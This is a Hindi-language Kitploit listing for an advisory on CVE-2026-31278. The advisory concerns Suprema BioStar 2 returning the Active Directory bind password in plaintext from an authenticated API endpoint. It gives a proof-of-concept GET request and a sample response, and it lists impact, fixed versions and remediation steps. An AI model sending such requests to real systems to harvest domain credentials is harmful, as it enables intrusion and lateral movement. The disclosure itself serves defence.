Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31278 — Suprema BioStar 2 में Active Directory क्रेडेंशियल एक्सपोज़र भेद्यता के लिए CVE लेख | Kitploit
उपकरण/GitHubGitHub/mda1r/cve-2026-31278
भेद्यता स्कैनरपासवर्ड हमलेशोषणवेब सुरक्षानेटवर्क सुरक्षापेपर और शोध
GitHubmda1r/cve-2026-31278

CVE-2026-31278

Suprema BioStar 2 में Active Directory क्रेडेंशियल एक्सपोज़र भेद्यता के लिए CVE लेख

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31278 Suprema BioStar 2: Active Directory क्रेडेंशियल एक्सपोज़र


मेटाडेटा

फ़ील्डविवरण
CVE आईडीCVE-2026-31278
विक्रेताSuprema Inc.
उत्पादBioStar 2
भेद्यता प्रकारसंवेदनशील सूचना प्रकटीकरण / क्रेडेंशियल एक्सपोज़र
हमला वेक्टरदूरस्थ / प्रमाणित / कम जटिलता
गंभीरताउच्च
इसमें ठीक किया गयाBioStar 2 v2.9.12 / BioStarX v1.0.2
शोधकर्ताAbdullah Alannaz

सारांश

Suprema BioStar 2 में संवेदनशील जानकारी प्रकटीकरण भेद्यता मौजूद है, जो Active Directory एकीकरण सेटिंग्स के अनुचित प्रबंधन के कारण होती है। बैकएंड API एंडपॉइंट /api/v2/setting/adserversetting Active Directory बाइंड खाता क्रेडेंशियल्स को प्लेनटेक्स्ट में लौटाता है, भले ही प्रशासनिक UI में पासवर्ड मास्क किया गया हो।


प्रभावित संस्करण

  • BioStar 2 Core / AC v2.9.5.29
  • BioStar 2 T&A v2.9.5.3

तकनीकी विवरण

यद्यपि प्रशासनिक इंटरफ़ेस में पासवर्ड फ़ील्ड मास्क किया जाता है, बैकएंड API को प्रमाणित अनुरोध पूरे अनएन्क्रिप्टेड पासवर्ड के साथ-साथ LDAP कॉन्फ़िगरेशन पैरामीटर (अक्षम SSL संचार सहित) प्रकट करते हैं।

एक प्रमाणित हमलावर AD सर्वर कॉन्फ़िगरेशन एंडपॉइंट पर HTTP GET अनुरोध भेजता है और सर्वर प्रतिक्रिया में Active Directory सेवा खाता पासवर्ड को प्लेनटेक्स्ट में प्राप्त करता है।

प्रमाण की अवधारणा

अनुरोध:

root@kitploit:~
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>

प्रतिक्रिया:

root@kitploit:~
{
  "ad_server": "ldap://internal.domain.local",
  "bind_dn": "CN=svc_biostar,DC=domain,DC=local",
  "password": "<plaintext_password_returned_here>",
  "ssl_enabled": false
}

प्रभाव

एक प्रमाणित हमलावर प्रकट किए गए क्रेडेंशियल्स का उपयोग निम्न कार्यों के लिए कर सकता है:

  • Active Directory के विरुद्ध LDAP प्रमाणीकरण करना
  • डोमेन उपयोगकर्ताओं, समूहों और संगठनात्मक इकाइयों को सूचीबद्ध करना
  • आंतरिक नेटवर्क टोही करना
  • डोमेन से जुड़े सिस्टमों में लैटरल मूवमेंट करना
  • सेवा खाता अनुमतियों के आधार पर संभावित रूप से विशेषाधिकार बढ़ाना

समयरेखा

MITRE द्वारा CVE-2026-31278 निर्धारित | BioStar 2 v2.9.12 / BioStarX v1.0.2 में फिक्स जारी |


निवारण

  • BioStar 2 v2.9.12 या BioStarX v1.0.2 में अपडेट करें
  • सभी Active Directory सेवा खाता क्रेडेंशियल्स को तुरंत बदलें
  • API एक्सेस को केवल विश्वसनीय नेटवर्क खंडों तक सीमित करें
  • Active Directory संचार के लिए LDAPS (SSL) सक्षम करें

संदर्भ

  • Suprema Inc.: https://www.supremainc.com

श्रेय

Abdullah Alannaz सुरक्षा शोधकर्ता

यह भेद्यता Suprema को जिम्मेदारीपूर्वक प्रकट की गई थी। विक्रेता ने समस्या की पुष्टि की और CVE निर्धारण के लिए MITRE के साथ समन्वय किया।

टूल डाउनलोड करें